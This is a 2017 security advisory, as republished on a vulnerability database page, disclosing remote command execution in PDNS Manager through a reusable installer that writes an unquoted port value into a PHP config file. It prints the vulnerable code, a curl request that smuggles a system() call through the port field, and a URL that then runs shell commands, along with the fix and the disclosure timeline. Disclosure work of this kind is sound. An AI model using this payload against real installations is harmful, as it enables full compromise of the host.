Lucene search
K

PDNS Manager Remote Command Execution

🗓️ 05 Jul 2017 00:00:00Reported by redteam-pentesting.deType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 51 Views

PDNS Manager Remote Command Execution vulnerability discovered & fixed

Code
`Advisory: Remote Command Execution in PDNS Manager  
  
RedTeam Pentesting discovered that PDNS Manager is vulnerable to a  
remote command execution vulnerability, if for any reason the  
configuration file config/config-user.php does not exist.  
  
  
Details  
=======  
  
Product: PDNS Manager  
Affected Versions: Git master 3bf4e28 (2016-12-12) - 2bb00ea (2017-05-22)  
Fixed Versions: <= v1.2.1, >= Git Commit ccc4232  
Vulnerability Type: Remote Command Execution  
Security Risk: medium   
Vendor URL: https://pdnsmanager.lmitsystems.de/  
Vendor Status: fixed version released  
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2017-011  
Advisory Status: published  
CVE: GENERIC-MAP-NOMATCH  
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH  
  
  
Introduction  
============  
  
"PDNS Manager is a simple yet powerful administration tool for the  
Powerdns authoritative nameserver."  
"PNDS Manager was developed from scratch to achieve a user-friendly and  
pretty looking interface."  
(from project website) [0]  
  
  
More Details  
============  
  
PDNS Manager includes two files used for installation purposes,  
install.php and api/install.php. The documentation tells users to start  
the installation by navigating to install.php and filling out the form that is  
presented there to create a database connection and an admin account. When  
submitted, an HTTP POST request with the configuration data is sent to  
api/install.php. The data is first validated in api/install.php by using it to  
connect to the database:  
  
------------------------------------------------------------------------  
try {  
$db = new PDO("$input->type:dbname=$input->database;host=$input->host;port=$input->port", $input->user, $input->password);  
}  
catch (PDOException $e) {  
$retval['status'] = "error";  
$retval['message'] = serialize($e);  
}  
------------------------------------------------------------------------  
  
As long as a valid database connection can be made with the data from  
the POST request, the installation process continues. The configuration is  
written to the file config/config-user.php which then gets included from  
config/config-default.php:  
  
------------------------------------------------------------------------  
$configFile = Array();  
  
$configFile[] = '<?php';  
$configFile[] = '$config[\'db_host\']=\''.addslashes($input->host)."';";  
$configFile[] = '$config[\'db_user\']=\''.addslashes($input->user)."';";  
$configFile[] = '$config[\'db_password\']= \''.addslashes($input->password)."';";  
$configFile[] = '$config[\'db_name\']=\''.addslashes($input->database)."';";  
$configFile[] = '$config[\'db_port\']='.addslashes($input->port).";";  
$configFile[] = '$config[\'db_type\']=\''.addslashes($input->type)."';";  
  
$retval['status'] = "success";  
try {  
file_put_contents("../config/config-user.php", implode("\n", $configFile));  
}  
------------------------------------------------------------------------  
  
At the very beginning of install.php, it is checked whether the file  
config/config-user.php already exists. If this is the case, further  
execution of the installation process is aborted:  
  
------------------------------------------------------------------------  
if(file_exists("../config/config-user.php")) {  
echo "Permission denied!";  
exit();  
}  
------------------------------------------------------------------------  
  
However, the installation files are not removed and can therefore still  
be accessed. In consequence, attackers can (re-)run the installation  
process as long as the file config/config-user.php does not exist. This  
can be the case if either the installation routine was indeed not yet  
run, or the configuration details were added manually, e.g. by entering  
them directly into the file config/config-default.php.  
  
The provided configuration data is not verified for semantic or  
syntactic correctness in any way. Only the PHP function addslashes() is  
used for all inputs, to mask single quotes, double quotes and  
backslashes. While this prevents adding malicious input to the  
configuration values which are set in single quotes, the port, which is  
expected to be numeric, is not enclosed in single quotes, making it  
vulnerable to code injection. Therefore, an HTTP POST request with a  
manipulated port value like the following could be sent to the  
installer:  
  
------------------------------------------------------------------------  
POST /api/install.php HTTP/1.1  
Host: example.com  
[...]  
Connection: close  
  
{  
"host":"attacker-system.example.com",  
"user":"root",  
"password":"secret",  
"database":"pdnsdb",  
"port":"3306;system($_GET[chr(99).chr(109).chr(100)])",  
"userName":"administrator",  
"userPassword":"password",  
"type":"mysql"  
}  
------------------------------------------------------------------------  
  
To bypass the problem that the addslashes() function prevents the usage  
of single or double quotes for the GET variable name, it was instead  
encoded with the chr() function and decodes to the string "cmd".  
  
PDNS Manager since Git commit 3bf4e28[1] from 12 December 2016 uses the  
PHP PDO class for establishing a database connection. Since the PDO  
class is quite liberal in what it accepts in its Data Source Name  
parameter, the configuration parameters as shown above are accepted and  
allow for a valid database connection, as the additional data in the  
"port" parameter is ignored by the PDO class. Finally, the file  
config/config-user.php will be written with the following content:  
  
------------------------------------------------------------------------  
<?php  
$config['db_host'] = 'example.com';  
$config['db_user'] = 'root';  
$config['db_password'] = 'secret';  
$config['db_name'] = 'pdnsdb';  
$config['db_port'] = 3306;system($_GET[chr(99).chr(109).chr(100)]);  
$config['db_type'] = 'mysql';  
------------------------------------------------------------------------  
  
As config/config-user.php is a normal, executable PHP file, commands can  
now be executed on the affected system by requesting the following URL:  
  
------------------------------------------------------------------------  
http://example.com/config/config-user.php?cmd=uname%20-a  
------------------------------------------------------------------------  
  
  
Proof of Concept  
================  
  
1. Check if install.php is still available and can be used to write a new  
configuration by visiting the following URL:  
  
http://example.com/install.php  
  
2. Set up a database that PDNS Manager can connect to.  
  
3. Send an HTTP POST request with a manipulated "port" parameter, e.g.  
  
------------------------------------------------------------------------  
curl -H 'Content-Type: application/json' --data \  
'{"host":"attacker-system.example.com", \  
"user":"root", \  
"password":"secret", \  
"database":"pdnsdb", \  
"port":"3306;system($_GET[chr(99).chr(109).chr(100)])", \  
"userName":"administrator", \  
"userPassword":"password", \  
"type":"mysql"}' \  
http://example.com/api/install.php  
------------------------------------------------------------------------  
  
4. Run arbitrary commands:  
  
------------------------------------------------------------------------  
http://example.com/config/config-user.php?cmd=uname%20-a  
------------------------------------------------------------------------  
  
  
Workaround  
==========  
  
Ensure that config/config-user.php exists.  
  
  
Fix  
===  
  
The problem was fixed in the Git master branch in commit ccc4232[2].  
Alternatively, the stable version v1.2.1 and earlier are not affected.  
  
  
Security Risk  
=============  
  
The vulnerability is deemed to be of medium risk. The number of  
installations that are configured in the way described should be rather  
low, as it is not the recommended way of installing PDNS Manager and the  
development version of PDNS Manager needs to have been used. However, if  
such a configuration is found, arbitrary PHP code can be run on the  
system. Depending on the system's configuration, this can lead to a full  
compromise of the host running PDNS Manager.  
  
  
Timeline  
========  
  
2017-05-16 Vulnerability identified  
2017-06-16 Customer approved disclosure to vendor  
2017-06-27 Vendor notified  
2017-06-29 Vendor released fixed version  
2017-07-05 Advisory released  
  
  
References  
==========  
  
[0] https://pdnsmanager.lmitsystems.de/  
[1] https://github.com/loewexy/pdnsmanager/commit/3bf4e2874a0120d99ae02a1a9f4a6e74094c7dc1  
[2] https://github.com/loewexy/pdnsmanager/commit/ccc423291cb0e6f8c58849f71821e7425b7c030e  
  
  
RedTeam Pentesting GmbH  
=======================  
  
RedTeam Pentesting offers individual penetration tests performed by a  
team of specialised IT-security experts. Hereby, security weaknesses in  
company networks or products are uncovered and can be fixed immediately.  
  
As there are only few experts in this field, RedTeam Pentesting wants to  
share its knowledge and enhance the public knowledge with research in  
security-related areas. The results are made available as public  
security advisories.  
  
More information about RedTeam Pentesting can be found at:  
https://www.redteam-pentesting.de/  
  
  
Working at RedTeam Pentesting  
=============================  
  
RedTeam Pentesting is looking for penetration testers to join our team  
in Aachen, Germany. If you are interested please visit:  
https://www.redteam-pentesting.de/jobs/  
  
--   
RedTeam Pentesting GmbH Tel.: +49 241 510081-0  
Dennewartstr. 25-27 Fax : +49 241 510081-99  
52068 Aachen https://www.redteam-pentesting.de  
Germany Registergericht: Aachen HRB 14004  
Geschaftsfuhrer: Patrick Hof, Jens Liebchen  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation